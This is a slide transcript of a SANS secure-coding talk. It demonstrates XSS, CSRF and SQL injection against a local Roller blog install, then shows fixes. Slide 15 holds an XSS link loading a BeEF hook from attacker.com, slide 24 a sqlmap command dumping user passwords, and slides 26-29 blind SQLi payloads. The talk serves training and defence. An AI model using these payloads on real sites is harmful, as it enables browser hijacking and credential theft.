Successfully reported this slideshow.

Securing Java EE Web Apps

5 787 vues

Publié le

Publié dans : Technologie
  • Soyez le premier à commenter

Securing Java EE Web Apps

  1. 1. Securing Java EE Web Apps <ul><li>Frank Kim </li></ul><ul><li>Principal, ThinkSec </li></ul><ul><li>Author, SANS Institute </li></ul>
  2. 2. About <ul><li>Frank Kim </li></ul><ul><ul><li>Consultant, ThinkSec </li></ul></ul><ul><ul><li>Author, SANS Secure Coding in Java/JEE </li></ul></ul><ul><ul><li>SANS Application Security Curriculum Lead </li></ul></ul>
  3. 3. What You Should Know <ul><li>Hacking is not hard </li></ul><ul><li>Don’t trust any data </li></ul><ul><ul><li>Assume that your users are evil! </li></ul></ul>
  4. 4. Outline <ul><li>Web App Attack Refresher </li></ul><ul><ul><li>XSS, CSRF, SQL Injection </li></ul></ul><ul><li>Testing </li></ul><ul><ul><li>Hacking an open source app </li></ul></ul><ul><li>Secure Coding </li></ul><ul><ul><li>Fixing security bugs </li></ul></ul>
  5. 5. Cross-Site Scripting (XSS) <ul><li>Occurs when unvalidated data is displayed back to the browser </li></ul><ul><li>Types of XSS </li></ul><ul><ul><li>Stored </li></ul></ul><ul><ul><li>Reflected </li></ul></ul><ul><ul><li>Document Object Model (DOM) based </li></ul></ul>
  6. 6. Cross-Site Request Forgery (CSRF)
  7. 7. SQL Injection (SQLi) <ul><li>Occurs when dynamic SQL queries are used </li></ul><ul><ul><li>By injecting arbitrary SQL commands, attackers can extend the meaning of the original query </li></ul></ul><ul><ul><li>Can potentially execute any SQL statement on the database </li></ul></ul><ul><li>Very powerful </li></ul><ul><ul><li>#1 on CWE/SANS Top 25 Most Dangerous Software Errors </li></ul></ul><ul><ul><li>#1 on OWASP Top 10 </li></ul></ul>
  8. 8. Outline <ul><li>Web App Attack Refresher </li></ul><ul><ul><li>XSS, CSRF, SQL Injection </li></ul></ul><ul><li>Testing </li></ul><ul><ul><li>Hacking an open source app </li></ul></ul><ul><li>Secure Coding </li></ul><ul><ul><li>Fixing security bugs </li></ul></ul>
  9. 9. What are We Testing? <ul><li>Installation of Roller 3.0 </li></ul><ul><li>Fake install of SANS AppSec Street Fighter Blog </li></ul><ul><li>Want to simulate the actions that a real attacker might take </li></ul><ul><ul><li>There are definitely other avenues of attack </li></ul></ul><ul><ul><li>We're walking through one attack scenario </li></ul></ul>
  10. 10. Attack Scenario <ul><li>XSS to control the victim's browser </li></ul><ul><li>Combine XSS and CSRF to conduct a privilege escalation attack </li></ul><ul><ul><ul><li>- Use escalated privileges to access another feature </li></ul></ul></ul><ul><li>Use SQL Injection to access the database directly </li></ul>
  11. 11. Spot the Vuln - XSS
  12. 12. XSS in head.jsp
  13. 13. Testing the &quot;look&quot; Param <ul><li>Admin pages include head.jsp </li></ul><ul><li>The param is persistent for the session </li></ul>
  14. 14. XSS Exploitation <ul><li>Introducing BeEF </li></ul><ul><ul><li>Browser Exploitation Framework </li></ul></ul><ul><ul><li>http://www.bindshell.net/tools/beef </li></ul></ul><ul><li>Uses XSS to hook the victim's browser </li></ul><ul><ul><li>Log user keystrokes, view browsing history, execute JavaScript, etc </li></ul></ul><ul><ul><li>Advanced attacks - Metasploit integration, browser exploits, etc </li></ul></ul>
  15. 15. XSS Exploitation Overview Victim 1) Sends link with evil BeEF script http://localhost:8080/roller/roller-ui/yourWebsites.do?look=&quot;><script src=&quot;http://www.attacker.com/beef/hook/beefmagic.js.php&quot;></script> 2) Victim clicks evil link 3) Victim's browser sends data to attacker Attacker
  16. 16. BeEF XSS Demo
  17. 17. Spot the Vuln - CSRF
  18. 18. CSRF in UserAdmin.jsp Want to use CSRF to change this field
  19. 19. CSRF Demo
  20. 20. Spot the Vuln – SQL Injection
  21. 21. SQL Injection in UserServlet
  22. 22. SQL Injection Testing <ul><li>UserServlet is vulnerable to SQLi </li></ul><ul><ul><li>http://localhost:8080/roller/roller-ui/authoring/user </li></ul></ul>No results
  23. 23. Exploiting SQL Injection <ul><li>Introducing sqlmap </li></ul><ul><ul><li>http://sqlmap.sourceforge.net </li></ul></ul><ul><li>Tool that automates detection and exploitation of SQL Injection vulns </li></ul><ul><ul><li>Supports MySQL, Oracle, PostgreSQL, MS SQL Server </li></ul></ul><ul><ul><li>Supports blind, inband, and batch queries </li></ul></ul><ul><ul><li>Fingerprint/enumeration - dump db schemas, tables/column names, data, db users, etc </li></ul></ul><ul><ul><li>Takeover features - read/upload files, exec arbitrary commands, exec Metasploit shellcode, etc </li></ul></ul>
  24. 24. sqlmap Syntax <ul><li> Dump userids and passwords </li></ul><ul><ul><li>python sqlmap.py </li></ul></ul><ul><ul><li>-u &quot;http://localhost:8080/roller/roller-ui/authoring/user?startsWith=f%25&quot; </li></ul></ul><ul><ul><li>--cookie &quot;username=test; JSESSIONID==<INSERT HERE>&quot; </li></ul></ul><ul><ul><li>--drop-set-cookie -p startsWith </li></ul></ul><ul><ul><li>--dump -T rolleruser -C username,passphrase -v 2 </li></ul></ul>
  25. 25. SQL Injection Demo
  26. 26. How it Works <ul><li>f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy </li></ul><ul><li>f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 104 AND 'neEy' LIKE 'neEy </li></ul><ul><li>f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 105 AND 'neEy' LIKE 'neEy </li></ul>
  27. 27. Step By Step [0] <ul><li>SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1 ; </li></ul><ul><li>returns ilovethetajmahal </li></ul>
  28. 28. Step By Step [1] <ul><li>select MID ((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1 , 1); </li></ul><ul><li>returns i </li></ul><ul><li>select MID ((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2 , 1); </li></ul><ul><li>returns l </li></ul><ul><li>select MID ((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3 , 1); </li></ul><ul><li>returns o </li></ul>
  29. 29. Step By Step [2] <ul><li>select ORD (MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1 , 1)); </li></ul><ul><li>returns 105 </li></ul><ul><li>select ORD (MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2 , 1)); </li></ul><ul><li>returns 108 </li></ul><ul><li>select ORD (MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3 , 1)); </li></ul><ul><li>returns 111 </li></ul>
  30. 30. Attack Summary <ul><li>XSS to control the victim's browser </li></ul><ul><li>Combine XSS and CSRF to conduct a privilege escalation attack </li></ul><ul><ul><ul><li>- Use escalated privileges to access another feature </li></ul></ul></ul><ul><li>Use SQL Injection to access the database directly </li></ul>
  31. 31. Outline <ul><li>Web App Attack Refresher </li></ul><ul><ul><li>XSS, CSRF, SQL Injection </li></ul></ul><ul><li>Testing </li></ul><ul><ul><li>Hacking an open source app </li></ul></ul><ul><li>Secure Coding </li></ul><ul><ul><li>Fixing security bugs </li></ul></ul>
  32. 32. Data Validation Application Should I be consuming this? Should I be emitting this? Inbound Data Outbound Data Data Store Validation Encoding Encoding Validation Outbound Data Inbound Data Validation
  33. 33. Output Encoding <ul><li>Encoding </li></ul><ul><ul><li>Convert characters so they are treated as data and not special characters </li></ul></ul><ul><li>Must escape differently depending where data is displayed on the page </li></ul><ul><li>XSS Prevention Cheat Sheet </li></ul><ul><ul><li>http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet </li></ul></ul>
  34. 34. Fix XSS in head.jsp <ul><li>Add URL encoding </li></ul><ul><li><link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; media=&quot;all&quot; href=&quot;<%= request.getContextPath() %>/roller-ui/theme/<%= ESAPI.encoder().encodeForURL(theme) %>/colors.css&quot; /> </li></ul>
  35. 35. Fix CSRF <ul><li>UserAdmin.jsp </li></ul><ul><ul><li>Add anti-CSRF token </li></ul></ul><ul><li><input type=&quot;hidden&quot; name=<%= CSRFTokenUtil.SESSION_ATTR_KEY %> value=<%= CSRFTokenUtil.getToken(request.getSession(false)) %> > </li></ul><ul><li>UserAdminAction.java </li></ul><ul><ul><li>Check anti-CSRF token </li></ul></ul><ul><li>if (!CSRFTokenUtil.isValid(req.getSession(false), req)){ </li></ul><ul><ul><li>return mapping.findForward(&quot;error&quot;); </li></ul></ul><ul><ul><li>} </li></ul></ul>
  36. 36. Fix SQL Injection <ul><li>Use parameterized queries correctly </li></ul><ul><li>if (startsWith == null || startsWith.equals(&quot;&quot;)) { </li></ul><ul><li>query = &quot;SELECT username, emailaddress FROM rolleruser&quot;; </li></ul><ul><li>stmt = con.prepareStatement(query); </li></ul><ul><li>} else { </li></ul><ul><li>query = &quot;SELECT username, emailaddress FROM rolleruser </li></ul><ul><li>WHERE username like ? or emailaddress like ? &quot;; </li></ul><ul><li>stmt = con.prepareStatement (query); </li></ul><ul><li>stmt.setString (1, startsWith + &quot;%&quot;); </li></ul><ul><li>stmt.setString (2, startsWith + &quot;%&quot;); </li></ul><ul><li>} </li></ul><ul><li>rs = stmt.executeQuery(); </li></ul>
  37. 37. Building Secure Software Source: Microsoft SDL
  38. 38. Remember <ul><li>Hacking is not hard </li></ul><ul><li>Don’t trust any data </li></ul><ul><ul><li>Validate input </li></ul></ul><ul><ul><ul><li>Prefer whitelists </li></ul></ul></ul><ul><ul><ul><li>Use authenticity token </li></ul></ul></ul><ul><ul><li>Encode output </li></ul></ul><ul><ul><ul><li>Contextual encoding </li></ul></ul></ul><ul><ul><ul><li>Use parameterized queries </li></ul></ul></ul>
  39. 39. SANS Software Security <ul><li>SANS AppSec 2012 </li></ul><ul><ul><li>- April 30 - May 1 in Las Vegas </li></ul></ul><ul><ul><li>- CFP is open now! </li></ul></ul><ul><ul><li>- http://sans.org/appsec-2012 </li></ul></ul><ul><li>New courses </li></ul><ul><ul><li>- DEV551 Secure iOS Development </li></ul></ul><ul><ul><li>- DEV568 Secure Android Development </li></ul></ul><ul><li>Free resources </li></ul><ul><ul><li>- Top 25, blog, white papers, webcasts, and more at </li></ul></ul><ul><ul><li>- http://software-security.sans.org </li></ul></ul><ul><li>Discount </li></ul><ul><ul><li>- Save 10% using the discount code DEVOXX. Enterprise pricing avail. </li></ul></ul>
  40. 40. Thanks! <ul><li>Frank Kim </li></ul><ul><li>[email_address] @sansappsec </li></ul>

×